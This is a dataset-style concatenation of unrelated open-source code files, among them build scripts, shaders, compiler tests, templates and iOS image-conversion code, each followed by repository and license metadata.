--host=x86_64-cray-linux-gnu \
--disable-mpi-f77\
--disable-mpi-f90\
--without-tm \
--with-platform=./contrib/platform/${PLATFORM} \
--with-io-romio-flags="build_alias=x86_64-unknown-linux-gnu \
host_alias=x86_64-cray-linux-gnu \
--enable-ltdl-convenience --no-recursion" \
--with-alps=yes \
--prefix="$SW_INSTALL_ROOT/$VER" | tee build.log
#gmake all install | tee -a build.log
#chmod -R go+rx $SW_INSTALL_ROOT/$VER-$CMP
| Gnuplot | 4 | j-xiong/ompi | contrib/platform/ornl/ornl_configure.gnu | [
"BSD-3-Clause-Open-MPI"
] |
<div class="video-container"><iframe src="https://www.youtube.com/embed/<%= @id %>?autoplay=0&rel=0&origin=https://changelog.com" frameborder="0"></iframe></div>
| HTML+EEX | 2 | PsOverflow/changelog.com | lib/changelog_web/templates/news_item/_youtube_embed.html.eex | [
"MIT"
] |
Rebol [
Title: "Rebol3 file test script"
Author: "Oldes"
File: %format-test.r3
Tabs: 4
Needs: [%../quick-test-module.r3]
]
secure [%/ allow]
~~~start-file~~~ "FORMAT tests"
===start-group=== "FORMAT"
--test-- "issue-532"
;@@ https://github.com/Oldes/Rebol-issues/issues/532
str: format [8 -8] ["this will overrun" 123]
--assert all [
str = "this wil 123"
16 = length? str
]
===end-group===
~~~end-file~~~ | Rebol | 4 | semarie/rebol3-oldes | src/tests/units/format-test.r3 | [
"Apache-2.0"
] |
precision mediump float;
const float SQRT_2 = 1.4142135623730951;
const float SQRT_3 = sqrt(3.0);
const float PI = 3.14159265358979323846264;
const float IN_ANGLE = 0.6283185307179586; // PI/5. = 36 degrees (star of 5 pikes)
//const float OUT_ANGLE = PI/2. - IN_ANGLE; // External angle for regular stars
const float COS_A = 0.8090169943749475; // cos(IN_ANGLE)
const float SIN_A = 0.5877852522924731; // sin(IN_ANGLE)
const float COS_B = 0.5877852522924731; // cos(OUT_ANGLE)
const float SIN_B = 0.8090169943749475; // sin(OUT_ANGLE)
uniform float u_antialias;
varying vec4 v_line_color;
varying vec4 v_fill_color;
varying float v_linewidth;
varying float v_size;
varying vec2 v_coords;
#ifdef USE_ASTERISK
// asterisk
float marker(vec2 P, float size)
{
// Masks
float diamond = max(abs(SQRT_2 / 2.0 * (P.x - P.y)), abs(SQRT_2 / 2.0 * (P.x + P.y))) - size / 2.0;
float square = max(abs(P.x), abs(P.y)) - size / 2.0;
// Shapes
float X = min(abs(P.x - P.y), abs(P.x + P.y));
float cross = min(abs(P.x), abs(P.y));
// Result is union of masked shapes
float result = min(max(X, diamond), max(cross, square));
return max(result - v_linewidth/2.0 + u_antialias/2.0, 0.0);
}
#endif
#ifdef USE_CIRCLE
// circle
float marker(vec2 P, float size)
{
return length(P) - size/2.0;
}
#endif
#ifdef USE_DOT
float marker(vec2 P, float size)
{
return max(length(P) - size/8.0 - v_linewidth/15.0 + u_antialias, 0.0);
}
#endif
#ifdef USE_CIRCLE_DOT
float marker(vec2 P, float size)
{
float circle = length(P) - size/2.0;
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(circle, dot_);
}
#endif
#ifdef USE_SQUARE
// square
float marker(vec2 P, float size)
{
return max(abs(P.x), abs(P.y)) - size/2.0;
}
#endif
#ifdef USE_SQUARE_DOT
float marker(vec2 P, float size)
{
float square = max(abs(P.x), abs(P.y)) - size/2.0;
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(square, dot_);
}
#endif
#ifdef USE_DIAMOND
// diamond
float marker(vec2 P, float size)
{
float x = SQRT_2 / 2.0 * (P.x * 1.5 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.5 + P.y);
float r1 = max(abs(x), abs(y)) - size / (2.0 * SQRT_2);
return r1 / SQRT_2;
}
#endif
#ifdef USE_DIAMOND_DOT
float marker(vec2 P, float size)
{
float x = SQRT_2 / 2.0 * (P.x * 1.5 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.5 + P.y);
float r1 = max(abs(x), abs(y)) - size / (2.0 * SQRT_2);
float diamond = r1 / SQRT_2;
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(diamond, dot_);
}
#endif
#ifdef USE_HEX
// hex
float marker(vec2 P, float size)
{
vec2 q = abs(P);
return max(q.y * 0.57735 + q.x - 1.0 * size/2.0, q.y - 0.866 * size/2.0);
}
#endif
#ifdef USE_HEX_DOT
float marker(vec2 P, float size)
{
vec2 q = abs(P);
float hex = max(q.y * 0.57735 + q.x - 1.0 * size/2.0, q.y - 0.866 * size/2.0);
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
return max(hex, dot_);
}
#endif
#ifdef USE_STAR
// star
// https://iquilezles.org/www/articles/distfunctions2d/distfunctions2d.htm
float marker(vec2 P, float size)
{
float bn = mod(atan(P.x, -P.y), 2.0*IN_ANGLE) - IN_ANGLE;
P = length(P)*vec2(cos(bn), abs(sin(bn)));
P -= size*vec2(COS_A, SIN_A)/2.;
P += vec2(COS_B, SIN_B)*clamp(-(P.x*COS_B + P.y*SIN_B), 0.0, size*SIN_A/SIN_B/2.);
return length(P)*sign(P.x);
}
#endif
#ifdef USE_STAR_DOT
float marker(vec2 P, float size)
{
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
float bn = mod(atan(P.x, -P.y), 2.0*IN_ANGLE) - IN_ANGLE;
P = length(P)*vec2(cos(bn), abs(sin(bn)));
P -= size*vec2(COS_A, SIN_A)/2.;
P += vec2(COS_B, SIN_B)*clamp(-(P.x*COS_B + P.y*SIN_B), 0.0, size*SIN_A/SIN_B/2.);
float star = length(P)*sign(P.x);
return max(star, dot_);
}
#endif
#ifdef USE_TRIANGLE
// triangle
float marker(vec2 P, float size)
{
P.y -= size * 0.3;
float x = SQRT_2 / 2.0 * (P.x * 1.7 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.7 + P.y);
float r1 = max(abs(x), abs(y)) - size / 1.6;
float r2 = P.y;
return max(r1 / SQRT_2, r2); // Intersect diamond with rectangle
}
#endif
#ifdef USE_TRIANGLE_DOT
float marker(vec2 P, float size)
{
float dot_ = min(size/8.0 + v_linewidth/15.0 - u_antialias - length(P), 0.0);
P.y -= size * 0.3;
float x = SQRT_2 / 2.0 * (P.x * 1.7 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.7 + P.y);
float r1 = max(abs(x), abs(y)) - size / 1.6;
float r2 = P.y;
float triangle = max(r1 / SQRT_2, r2); // Intersect diamond with rectangle
return max(triangle, dot_);
}
#endif
#ifdef USE_INVERTED_TRIANGLE
// inverted_triangle
float marker(vec2 P, float size)
{
P.y += size * 0.3;
float x = SQRT_2 / 2.0 * (P.x * 1.7 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.7 + P.y);
float r1 = max(abs(x), abs(y)) - size / 1.6;
float r2 = - P.y;
return max(r1 / SQRT_2, r2); // Intersect diamond with rectangle
}
#endif
#ifdef USE_CROSS
// cross
float marker(vec2 P, float size)
{
float square = max(abs(P.x), abs(P.y)) - size / 2.0;
float cross = min(abs(P.x), abs(P.y));
cross = max(cross - v_linewidth/2.0 + u_antialias/2.0, 0.0);
return max(square, cross);
}
#endif
#ifdef USE_DASH
float marker(vec2 P, float size)
{
float square = max(abs(P.x), abs(P.y)) - size / 2.0;
float cross = abs(P.y);
cross = max(cross - v_linewidth/2.0 + u_antialias/2.0, 0.0);
return max(square, cross);
}
#endif
#ifdef USE_CIRCLE_CROSS
// circle_cross
float marker(vec2 P, float size)
{
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(P.x - qs), abs(P.y - qs)) - qs;
float s2 = max(abs(P.x + qs), abs(P.y - qs)) - qs;
float s3 = max(abs(P.x - qs), abs(P.y + qs)) - qs;
float s4 = max(abs(P.x + qs), abs(P.y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float circle = length(P) - size/2.0;
float c1 = max(circle, s1);
float c2 = max(circle, s2);
float c3 = max(circle, s3);
float c4 = max(circle, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_SQUARE_CROSS
// square_cross
float marker(vec2 P, float size)
{
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(P.x - qs), abs(P.y - qs)) - qs;
float s2 = max(abs(P.x + qs), abs(P.y - qs)) - qs;
float s3 = max(abs(P.x - qs), abs(P.y + qs)) - qs;
float s4 = max(abs(P.x + qs), abs(P.y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float square = max(abs(P.x), abs(P.y)) - size/2.0;
float c1 = max(square, s1);
float c2 = max(square, s2);
float c3 = max(square, s3);
float c4 = max(square, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_DIAMOND_CROSS
// diamond_cross
float marker(vec2 P, float size)
{
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(P.x - qs), abs(P.y - qs)) - qs;
float s2 = max(abs(P.x + qs), abs(P.y - qs)) - qs;
float s3 = max(abs(P.x - qs), abs(P.y + qs)) - qs;
float s4 = max(abs(P.x + qs), abs(P.y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float x = SQRT_2 / 2.0 * (P.x * 1.5 - P.y);
float y = SQRT_2 / 2.0 * (P.x * 1.5 + P.y);
float diamond = max(abs(x), abs(y)) - size / (2.0 * SQRT_2);
diamond /= SQRT_2;
float c1 = max(diamond, s1);
float c2 = max(diamond, s2);
float c3 = max(diamond, s3);
float c4 = max(diamond, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_X
// x
float marker(vec2 P, float size)
{
float circle = length(P) - size / 2.0;
float X = min(abs(P.x - P.y), abs(P.x + P.y));
X = max(X - v_linewidth/2.0, 0.0);
return max(circle, X);
}
#endif
#ifdef USE_Y
float marker(vec2 P, float size)
{
float circle = length(P) - size / 2.0;
float dx = 1.0 / SQRT_3;
float dy = SQRT_2 / SQRT_3;
// Sideways distance from the three spokes.
float d0 = abs(P.x);
float d1 = abs(dot(P, vec2(dx, dy)));
float d2 = abs(dot(P, vec2(dx, -dy)));
// Clip each spoke to semicircle.
d0 = max(d0, -P.y);
d1 = max(d1, dot(P, vec2(-dy, dx)));
d2 = max(d2, dot(P, vec2(dy, dx)));
float Y = min(min(d0, d1), d2);
Y = max(Y - v_linewidth/2.0 + u_antialias/2.0, 0.0);
return max(circle, Y);
}
#endif
#ifdef USE_CIRCLE_X
// circle_x
float marker(vec2 P, float size)
{
float x = P.x - P.y;
float y = P.x + P.y;
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(x - qs), abs(y - qs)) - qs;
float s2 = max(abs(x + qs), abs(y - qs)) - qs;
float s3 = max(abs(x - qs), abs(y + qs)) - qs;
float s4 = max(abs(x + qs), abs(y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float circle = length(P) - size/2.0;
float c1 = max(circle, s1);
float c2 = max(circle, s2);
float c3 = max(circle, s3);
float c4 = max(circle, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_CIRCLE_Y
float marker(vec2 P, float size)
{
float circle = length(P) - size/2.0;
float dx = 1.0 / SQRT_3;
float dy = SQRT_2 / SQRT_3;
// Sideways distance from the three spokes.
float d0 = abs(P.x);
float d1 = abs(dot(P, vec2(dx, dy)));
float d2 = abs(dot(P, vec2(dx, -dy)));
// Clip each spoke to semicircle.
d0 = max(d0, -P.y);
d1 = max(d1, dot(P, vec2(-dy, dx)));
d2 = max(d2, dot(P, vec2(dy, dx)));
float Y = min(min(d0, d1), d2);
Y = min(v_linewidth/2.0 - u_antialias/2.0 - Y, 0.0);
return max(circle, Y);
}
#endif
#ifdef USE_SQUARE_X
// square_x
float marker(vec2 P, float size)
{
float x = P.x - P.y;
float y = P.x + P.y;
// Define quadrants
float qs = size / 2.0; // quadrant size
float s1 = max(abs(x - qs), abs(y - qs)) - qs;
float s2 = max(abs(x + qs), abs(y - qs)) - qs;
float s3 = max(abs(x - qs), abs(y + qs)) - qs;
float s4 = max(abs(x + qs), abs(y + qs)) - qs;
// Intersect main shape with quadrants (to form cross)
float square = max(abs(P.x), abs(P.y)) - size/2.0;
float c1 = max(square, s1);
float c2 = max(square, s2);
float c3 = max(square, s3);
float c4 = max(square, s4);
// Union
return min(min(min(c1, c2), c3), c4);
}
#endif
#ifdef USE_PLUS
float marker(vec2 P, float size)
{
vec2 size2 = vec2(size*0.5, size*0.2);
P = abs(P);
P = (P.y > P.x) ? P.yx : P.xy;
vec2 q = P - size2;
float k = max(q.y, q.x);
vec2 w = (k > 0.0) ? q : vec2(size2.y - P.x, -k);
return sign(k)*length(max(w, 0.0));
}
#endif
#ifdef USE_SQUARE_PIN
float marker(vec2 P, float size)
{
float actual_size = size*1.2;
float radius = 0.75*actual_size; // Radius of curvature of edges.
float offset = actual_size/2.0 + sqrt(radius*radius - actual_size*actual_size/4.0);
vec2 centerx = vec2(offset, 0.0);
vec2 centery = vec2(0.0, offset);
float right = length(P - centerx);
float left = length(P + centerx);
float up = length(P - centery);
float down = length(P + centery);
float pin = radius - min(min(right, left), min(up, down));
float circle = length(P) - actual_size*0.6;
return max(circle, pin);
}
#endif
#ifdef USE_TRIANGLE_PIN
float marker(vec2 P, float size)
{
float actual_size = size*1.2;
float radius = 1.2*actual_size; // Radius of curvature of edges.
float angle = 2.0*PI / 3.0;
float c = cos(angle);
float s = sin(angle);
mat2 rotation = mat2(c, -s, s, c);
// Half the length of straight triangle edge.
float half_edge = actual_size*SQRT_3/4.0;
// Distance from center of triangle to middle of straight edge.
float centre_middle_edge = 0.25*actual_size;
float offset = centre_middle_edge + sqrt(radius*radius - half_edge*half_edge);
// Centre of curvature.
vec2 center = vec2(0.0, offset);
float dist0 = length(P - center);
P = rotation*P;
float dist1 = length(P - center);
P = rotation*P;
float dist2 = length(P - center);
float pin = radius - min(min(dist0, dist1), dist2);
float circle = length(P) - actual_size / 2.0;
return max(circle, pin);
}
#endif
vec4 outline(float distance, float linewidth, float antialias, vec4 line_color,
vec4 fill_color)
{
vec4 frag_color;
float t = min(linewidth/2.0 - antialias, 0.0); // Line half-width.
float signed_distance = distance;
float border_distance = abs(signed_distance) - t;
float alpha = border_distance/antialias;
alpha = exp(-alpha*alpha);
// If line alpha is zero, it probably means no outline. To avoid a dark
// outline shining through due to antialiasing, we set the line color to the
// fill color.
float select = float(bool(line_color.a));
line_color.rgb = select*line_color.rgb + (1.0 - select)*fill_color.rgb;
// Similarly, if we want a transparent fill.
select = float(bool(fill_color.a));
fill_color.rgb = select*fill_color.rgb + (1.0 - select)*line_color.rgb;
if (border_distance < 0.0)
frag_color = line_color;
else if (signed_distance < 0.0)
frag_color = mix(fill_color, line_color, sqrt(alpha));
else {
if (abs(signed_distance) < linewidth/2.0 + antialias)
frag_color = vec4(line_color.rgb, line_color.a*alpha);
else
discard;
}
return frag_color;
}
void main()
{
float distance = marker(v_coords, v_size);
gl_FragColor = outline(
distance, v_linewidth, u_antialias, v_line_color, v_fill_color);
gl_FragColor.rgb *= gl_FragColor.a; // Premultiplied alpha.
}
| GLSL | 5 | g-parki/bokeh | bokehjs/src/lib/models/glyphs/webgl/markers.frag | [
"BSD-3-Clause"
] |
CALL gn gen out/Default
CALL ninja -j 200 -C out/Default chrome eventlog_provider
| Batchfile | 1 | NareshMurthy/playwright | browser_patches/chromium/buildwingoma.bat | [
"Apache-2.0"
] |
{
"props": {
"children": { "type": { "name": "node" } },
"classes": { "type": { "name": "object" } },
"max": { "type": { "name": "custom", "description": "number" }, "default": "5" },
"spacing": {
"type": {
"name": "union",
"description": "'medium'<br>| 'small'<br>| number"
},
"default": "'medium'"
},
"sx": {
"type": {
"name": "union",
"description": "Array<func<br>| object<br>| bool><br>| func<br>| object"
}
},
"total": { "type": { "name": "number" }, "default": "children.length" },
"variant": {
"type": {
"name": "union",
"description": "'circular'<br>| 'rounded'<br>| 'square'<br>| string"
},
"default": "'circular'"
}
},
"name": "AvatarGroup",
"styles": { "classes": ["root", "avatar"], "globalClasses": {}, "name": "MuiAvatarGroup" },
"spread": true,
"forwardsRefTo": "HTMLDivElement",
"filename": "/packages/mui-material/src/AvatarGroup/AvatarGroup.js",
"inheritance": null,
"demos": "<ul><li><a href=\"/components/avatars/\">Avatars</a></li></ul>",
"cssComponent": false
}
| JSON | 3 | VirdocsSoftware/rs-icons | docs/pages/api-docs/avatar-group.json | [
"MIT"
] |
package test
public final annotation class A1 : kotlin.Annotation {
/*primary*/ public constructor A1()
}
public final annotation class A2 : kotlin.Annotation {
/*primary*/ public constructor A2()
}
public final annotation class A3 : kotlin.Annotation {
/*primary*/ public constructor A3()
}
@test.A1 @test.A2 @test.A3 public final class Class {
/*primary*/ public constructor Class()
}
| Text | 4 | qussarah/declare | compiler/testData/loadJava/compiledKotlin/annotations/classes/MultipleAnnotations.txt | [
"Apache-2.0"
] |
// force-host
// no-prefer-dynamic
#![feature(proc_macro_quote)]
#![feature(proc_macro_internals)] // FIXME - this shouldn't be necessary
#![crate_type = "proc-macro"]
extern crate proc_macro;
extern crate custom_quote;
use proc_macro::{quote, TokenStream};
macro_rules! expand_to_quote {
() => {
quote! {
let bang_error: bool = 25;
}
}
}
#[proc_macro]
pub fn error_from_bang(_input: TokenStream) -> TokenStream {
expand_to_quote!()
}
#[proc_macro]
pub fn other_error_from_bang(_input: TokenStream) -> TokenStream {
custom_quote::custom_quote! {
my_ident
}
}
#[proc_macro_attribute]
pub fn error_from_attribute(_args: TokenStream, _input: TokenStream) -> TokenStream {
quote! {
struct AttributeError {
field: MissingType
}
}
}
#[proc_macro_derive(ErrorFromDerive)]
pub fn error_from_derive(_input: TokenStream) -> TokenStream {
quote! {
enum DeriveError {
Variant(OtherMissingType)
}
}
}
| Rust | 3 | mbc-git/rust | src/test/ui/proc-macro/auxiliary/span-from-proc-macro.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
@import './dir/*.css';
.index {
color: red;
}
| CSS | 1 | johanberonius/parcel | packages/core/integration-tests/test/integration/glob-css/index.css | [
"MIT"
] |
open import Agda.Builtin.Reflection
open import Agda.Builtin.List
open import Agda.Builtin.Unit
macro
m-0 : Term → TC ⊤
m-0 goal =
bindTC (inferType goal) λ where
(pi (arg (arg-info _ (modality _ quantity-0)) _) _) →
bindTC (quoteTC (λ (_ : Set) → Set))
(unify goal)
type → typeError (termErr type ∷ [])
m-ω : Term → TC ⊤
m-ω goal =
bindTC (inferType goal) λ where
(pi (arg (arg-info _ (modality _ quantity-ω)) _) _) →
bindTC (quoteTC (λ (_ : Set) → Set))
(unify goal)
type → typeError (termErr type ∷ [])
_ : @0 Set → Set₁
_ = m-0
_ : @ω Set → Set₁
_ = m-ω
postulate
f : @0 Set₁ → Set₁
macro
m₁ : Set₁ → Term → TC ⊤
m₁ A goal =
bindTC (quoteTC A) λ A →
unify goal
(def (quote f)
(arg (arg-info visible (modality relevant quantity-0)) A ∷
[]))
_ : Set₁ → Set₁
_ = λ A → m₁ A
macro
m₂ : Set₁ → Term → TC ⊤
m₂ A goal =
bindTC (quoteTC A) λ A →
unify goal
(def (quote f)
-- The modality is ignored.
(arg (arg-info visible (modality irrelevant quantity-ω)) A ∷
[]))
_ : Set₁ → Set₁
_ = λ A → m₂ A
| Agda | 4 | cruhland/agda | test/Succeed/Issue5317.agda | [
"MIT"
] |
<table><tr><th>id</th><th>message</th></tr>{% for fortune in fortunes %}<tr><td>{{ fortune.getId() }}</td><td>{{ fortune.message | e }}</td></tr>{% endfor %}</table> | Volt | 3 | efectn/FrameworkBenchmarks | frameworks/PHP/phalcon/app/views/mongo/fortunes.volt | [
"BSD-3-Clause"
] |
#!/usr/bin/env golosh
module audiostreamerscrobbler.Audiostreamerscrobbler
import audiostreamerscrobbler.factories.{Config, PlayerControlThreadFactory, ScrobblersFactory, ScrobblerErrorHandlerFactory}
import audiostreamerscrobbler.utils.{NetworkUtils, VerySimpleArgsParser}
import gololang.IO
import java.util.Arrays
function main = |args| {
run(args)
}
local function run = |args| {
let isHandled = handleCommandLineOptions(args)
if (isHandled) {
return
}
let isConfigFileValid = validateAndInitConfig()
if (not isConfigFileValid) {
return
}
let scrobblerErrorHandler = createScrobblerErrorHandlerFactory(): createScrobblerErrorHandler()
scrobblerErrorHandler: start()
let playerControlThreadFactory = createPlayerControlThreadFactory()
let playerControlThread = playerControlThreadFactory: createPlayerControlThread(scrobblerErrorHandler)
playerControlThread: start()
}
local function validateAndInitConfig = {
if not fileExists("config.json") {
println("Configuration file \"config.json\" was not found in the current directory.")
println("See project's website \"https://github.com/vvdleun/audiostreamerscrobbler\" for an example.")
println("\nAt this time, this file must be created and configured manually.")
return false
}
try {
initConfig()
let config = getConfig()
} catch(ex) {
println("Error while reading config.json. Please check whether the file is valid JSON and uses UTF-8 encoding.")
println("\nPlease accept our apologies for the fact that this file has to be edited manually for now. For the future an user-friendly GUI editor feature is planned.")
println("\nReported error: " + ex)
return false
}
return true
}
local function handleCommandLineOptions = |args| {
let parser = createVerySimpleArgsParser(args)
var option = parser: parseNext()
while (option != null) {
case {
when option == "--authorize" {
return authorizeService(parser)
}
when option == "--networkinterfaces" {
return showNetworkInterfaces()
}
otherwise {
return showHelp(option)
}
}
option = parser: parseNext()
}
return false
}
local function showHelp = |option| {
if (option != "--help") {
println("Unrecognized option: \"" + option + "\"\n")
}
println("Valid options:\n")
println("--authorize [" + getScrobblerKeyNames():join("|") + "]")
println(" Starts the authorization process for the specified music tracking service.\n")
println("--networkinterfaces")
println(" Shows network interface names and addresses that can be used in configuration file")
println("--help")
println(" Shows this help screen\n")
return true
}
local function authorizeService = |parser| {
try {
_authorizeService(parser)
} catch(ex) {
println("\nUnexpected error occurred: " + ex)
println("")
throw ex
}
return true
}
local function _authorizeService = |parser| {
let service = parser: parseNext()
if (service is null) {
println("No service specified. Valid syntax: --authorize [" + getScrobblerKeyNames(): join("|") + "]\n")
println("Example: --authorize " + getScrobblerKeyNames(): get(0))
return
}
let isConfigFileValid = validateAndInitConfig()
if (not isConfigFileValid) {
return
}
let scrobblersFactory = createScrobblersFactory()
let authorizer = scrobblersFactory: createScrobblerAuthorizer(service)
if (authorizer == null) {
println("Specified scrobbler service '" + service + "' is unknown. Known services are: " + getScrobblerKeyNames(): join(", "))
return
}
authorizer: authorize()
}
local function showNetworkInterfaces = {
getNetworkInterfaces(): each(|i| {
println("Alias : \"" + i: getName() + "\"")
println("Name : \"" + i: getDisplayName() + "\"")
println("Addresses: " + ["\"" + a: getHostAddress() + "\"" foreach a in getInetAddresses(i)]: join(" "))
println("\n\n")
})
return true
} | Golo | 4 | vvdleun/audiostreamerscrobbler | src/main/golo/Audiostreamerscrobbler.golo | [
"MIT"
] |
rendered template for <%= @name %>
| HTML+EEX | 1 | faheempatel/phoenix | test/fixtures/templates/user/render_template.html.eex | [
"MIT"
] |
import "std/test"
test.run("Compound equality", fn(assert) {
const a = 5
const b = 6
const c = 5
assert.isFalse(a >= b)
assert.isFalse(b <= a)
assert.isTrue(a <= c)
assert.isTrue(a >= c)
})
test.run("Compound assignment", fn(assert) {
let a = 5
a += 2
assert.isEq(a, 7)
a -= 3
assert.isEq(a, 4)
a *= 2
assert.isEq(a, 8)
a /= 4
assert.isEq(a, 2)
})
| Inform 7 | 4 | lfkeitel/nitrogen | tests/basic/compounds.ni | [
"BSD-3-Clause"
] |
-- (c) 2009 Aarne Ranta under LGPL
instance LexFoodsGer of LexFoods =
open SyntaxGer, ParadigmsGer in {
flags coding=utf8;
oper
wine_N = mkN "Wein" ;
pizza_N = mkN "Pizza" "Pizzen" feminine ;
cheese_N = mkN "Käse" "Käse" masculine ;
fish_N = mkN "Fisch" ;
fresh_A = mkA "frisch" ;
warm_A = mkA "warm" "wärmer" "wärmste" ;
italian_A = mkA "italienisch" ;
expensive_A = mkA "teuer" ;
delicious_A = mkA "köstlich" ;
boring_A = mkA "langweilig" ;
}
| Grammatical Framework | 4 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Grammatical Framework/LexFoodsGer.gf | [
"MIT"
] |
const { powerSaveBlocker } = process._linkedBinding('electron_browser_power_save_blocker');
export default powerSaveBlocker;
| TypeScript | 2 | lingxiao-Zhu/electron | lib/browser/api/power-save-blocker.ts | [
"MIT"
] |
/*
* Copyright (c) 2021, Tim Flynn <trflynn89@pm.me>
*
* SPDX-License-Identifier: BSD-2-Clause
*/
#include "LoadRequest.h"
#include <LibWeb/Cookie/Cookie.h>
#include <LibWeb/Page/Page.h>
namespace Web {
LoadRequest LoadRequest::create_for_url_on_page(const AK::URL& url, Page* page)
{
LoadRequest request;
request.set_url(url);
if (page) {
String cookie = page->client().page_did_request_cookie(url, Cookie::Source::Http);
if (!cookie.is_empty())
request.set_header("Cookie", cookie);
}
return request;
}
}
| C++ | 4 | r00ster91/serenity | Userland/Libraries/LibWeb/Loader/LoadRequest.cpp | [
"BSD-2-Clause"
] |
@font-face{font-family:MyHelvetica;src:local('Helvetica Neue Bold'), local('HelveticaNeue-Bold'), url(MgOpenModernaBold.ttf);font-weight:bold} | CSS | 1 | Theo-Steiner/svelte | test/css/samples/supports-font-face/expected.css | [
"MIT"
] |
using Uno;
using Uno.Platform;
using Uno.Collections;
using Uno.Platform.iOS;
using Uno.Compiler.ExportTargetInterop;
using Fuse.Platform;
using Uno.Graphics;
namespace Fuse.iOS
{
[Require("Source.Include", "@{Uno.Platform.iOS.Application:Include}")]
[Require("Source.Include", "Foundation/Foundation.h")]
[Require("Source.Include", "CoreGraphics/CoreGraphics.h")]
[Require("Source.Include", "UIKit/UIKit.h")]
[Set("FileExtension", "mm")]
public extern(IOS) static class Support
{
public static Texture2D CreateTextureFromImage(UIImage image)
{
int2 bitmapSize = UIImageGetSize(image);
byte[] bitmap = UIImageToRGBA8888(image);
Texture2D texture = new Texture2D(bitmapSize, Format.RGBA8888, false);
texture.Update(extern<IntPtr>(bitmap) "$0->Ptr()");
return texture;
}
static int2 UIImageGetSize(UIImage image)
@{
CGSize imageSize = image.size;
int width = (int) imageSize.width;
int height = (int) imageSize.height;
return @{Uno.Int2(int,int):New(width, height)};
@}
static byte[] UIImageToRGBA8888(UIImage _image)
@{
CGImageRef image = [((UIImage*)_image) CGImage];
if (image == NULL)
return NULL;
UIImageOrientation orientation = _image.imageOrientation;
CGRect imageRect = CGRectMake(0, 0, CGImageGetWidth(image), CGImageGetHeight(image));
int bitmapWidth = imageRect.size.width;
int bitmapHeight = imageRect.size.height;
if (int(orientation) & 0x2)
{
// Transpose for Left* and Right* orientations
bitmapWidth = imageRect.size.height;
bitmapHeight = imageRect.size.width;
}
uArray *bitmap = @{byte[]:New(bitmapWidth * bitmapHeight * 4)};
CGColorSpaceRef colorSpace = CGColorSpaceCreateDeviceRGB();
CGContextRef context = CGBitmapContextCreate(bitmap->Ptr(),
bitmapWidth, bitmapHeight, 8, 4 * bitmapWidth, colorSpace,
kCGImageAlphaPremultipliedLast | kCGBitmapByteOrder32Big);
switch (orientation)
{
// Right side up
case UIImageOrientationUp:
break;
case UIImageOrientationUpMirrored:
CGContextTranslateCTM(context, imageRect.size.width, 0);
CGContextScaleCTM(context, -1., 1.);
break;
// Upside down
case UIImageOrientationDown:
CGContextRotateCTM(context, M_PI);
CGContextTranslateCTM(
context, -imageRect.size.width, -imageRect.size.height);
break;
case UIImageOrientationDownMirrored:
CGContextRotateCTM(context, M_PI);
CGContextTranslateCTM(context, 0, -imageRect.size.height);
CGContextScaleCTM(context, -1., 1.);
break;
// Left
case UIImageOrientationLeft:
CGContextRotateCTM(context, M_PI_2);
CGContextTranslateCTM(context, 0, -imageRect.size.height);
break;
case UIImageOrientationLeftMirrored:
CGContextRotateCTM(context, M_PI_2);
CGContextTranslateCTM(
context, imageRect.size.width, -imageRect.size.height);
CGContextScaleCTM(context, -1., 1.);
break;
// Right
case UIImageOrientationRight:
CGContextRotateCTM(context, -M_PI_2);
CGContextTranslateCTM(context, -imageRect.size.width, 0);
break;
case UIImageOrientationRightMirrored:
CGContextRotateCTM(context, -M_PI_2);
CGContextScaleCTM(context, -1., 1.);
break;
}
CGContextDrawImage(context, imageRect, image);
CGContextRelease(context);
CGColorSpaceRelease(colorSpace);
return bitmap;
@}
public static extern int2 CGPointToUnoInt2(uCGPoint point, float scale)
@{
@{Uno.Int2} unoPoint;
unoPoint.X = $0.x * $1;
unoPoint.Y = $0.y * $1;
return unoPoint;
@}
public static extern uCGPoint CGPointFromUnoInt2(int2 unoPoint, float scale)
@{
CGPoint point;
point.x = $0.X / $1;
point.y = $0.Y / $1;
return point;
@}
public static extern uCGPoint CGPointFromUnoFloat2(float2 unoPoint, float scale)
@{
CGPoint point;
point.x = $0.X / $1;
point.y = $0.Y / $1;
return point;
@}
public static extern uCGRect CGRectFromUnoRect(Rect unoRect, float scale)
@{
CGRect rect;
rect.origin.x = $0.Left / $1;
rect.origin.y = $0.Top / $1;
rect.size.width = ($0.Right - $0.Left) / $1;
rect.size.height = ($0.Bottom - $0.Top) / $1;
return rect;
@}
public static extern uCGRect CGRectFromUnoRecti(Recti unoRect, float scale)
@{
CGRect rect;
rect.origin.x = $0.Left / $1;
rect.origin.y = $0.Top / $1;
rect.size.width = ($0.Right - $0.Left) / $1;
rect.size.height = ($0.Bottom - $0.Top) / $1;
return rect;
@}
public static extern Recti CGRectToUnoRecti(uCGRect rect, float scale)
{
var origin = CGPointToUnoInt2(extern<uCGPoint>(rect)"$0.origin", scale);
var size = CGSizeToUnoInt2(extern<uCGSize>(rect)"$0.size", scale);
return new Uno.Recti(origin, size);
}
public static extern int2 CGSizeToUnoInt2(uCGSize size, float scale)
@{
